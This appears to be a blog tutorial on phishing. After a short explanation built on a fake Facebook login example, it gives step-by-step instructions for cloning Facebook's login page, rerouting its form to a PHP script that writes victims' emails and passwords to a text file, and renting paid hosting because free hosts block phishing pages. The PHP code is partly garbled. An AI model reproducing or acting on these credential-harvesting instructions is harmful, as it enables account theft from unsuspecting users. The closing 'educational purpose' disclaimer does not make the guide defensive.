Phishing is one of the most popular techniques used for stealing
passwords and other sensitive information such as credit card details and
banking usernames and passwords.
Phishing, also known as a fishing attack, is the process of creating a
duplicate copy or clone of a reputable website with the intention of
stealing a user’s password or other sensitive information such as
credit card details.
Anyone with a little technical knowledge can get a phishing page
made, and that is why this method is so popular.
Phishing scams prompt users to enter sensitive details on a fake
webpage (phishing page) whose look and feel are nearly identical to the
legitimate web page. In most cases, the only difference is the
URL.
The URL can also be spoofed in some cases if the legitimate website is
vulnerable. It is difficult for an ordinary user to identify a phishing
page because of its trustworthy layout.
How does phishing method work?
Attackers target the general public and send phishing links
through email or personal messages, where the victim is prompted to
click on a link. The victim is then taken to
a phishing page that pretends to be legitimate.
People who don’t find the phishing page suspicious are
induced to enter their sensitive information, and all of that information
is sent to the attacker.
Phishing Example
Let us take Facebook as an example.
The attacker creates a page that looks exactly like the Facebook login page but
hosts it at a different URL such as fakebook.com or faecbook.com, or any
URL that pretends to be legitimate.
When a user lands on such a page, he or she might think it is the real
Facebook login page asking for a username and
password.
People who don’t find the fake login page suspicious
might enter their username and password, and that information would
be sent to the attacker who created the page. At the same time, the victim
would be redirected to the original Facebook page.
Real Life Example: John is a programmer. He creates a Facebook login page with some
scripts that let him capture the username and password information,
and puts it at https://www.facebouk.com/try-your-luck-tricks.
Peter is a friend of John. John sends a message to Peter: “Hey Peter, I
found a way to make money online easily, you should definitely take a
look at this https://www.facebouk.com/try-your-luck-tricks”.
Peter navigates to the link and sees a Facebook login page. As usual,
Peter enters his Facebook username and password. Now Peter’s
username and password are sent to John, and Peter gets redirected
to a money making tips
page, https://www.facebouk.com/try-your-luck-tricks-tips.html.
That’s all it takes: Peter’s Facebook account is hacked.
How to create a Phishing page in minutes?
We are going to take Facebook phishing page as an example.
- Go to Facebook.com, make sure you are not logged in to Facebook.
- Press Ctrl U to view the source code.
- Copy the source code and paste it in a notepad.
- Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl F in notepad. In Facebook login page, action attribute was filled with Facebook login process URL, replace it with process.php
- You have to find name of input fields using inspect element (Ctrl Shft I in Chrome), in our case, it is email and pass
- Save this file as index.html
- Now you have to get username and password stored in a text file named phishing.txt
- Create a file named process.php using the following code.
Process.php
if(isset($_POST[’email’]) && isset($_POST[‘pass’])) { $password=file_get_contents(‘phishing.txt’); $phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” ,
Password”.$_POST[‘pass’].”\n”); fclose($file); echo ‘
’; } else echo ‘
’; ?>
How to host phishing page in a URL?
To put phishing page in a URL, you need to have two things.
- Domain
- Web Hosting
Get a Free Domain
You can create a lifetime free domain at Bluehost if you pay
for their hosting plans. Once you create a domain, you need to get
hosting and setup name servers for it. If you select Bluehost you don’t
need to setup nameservers since it will already be set.
Get Web Hosting
Almost all free hosting panels would block phishing pages. So you need
to get any paid shared hosting package, it would cost around $4 USD per
month. I prefer Bluehost for their excellent service and performance.
You can also read how to create a website in Bluehost if you
are new to domain and hosting.
NOTE: THIS POST IS JUST FOR EDUCATIONAL PURPOSE. I WOULD NOT BE
RESPONSIBLE FOR ANY DAMAGE.
TRY AT YOUR OWN RISK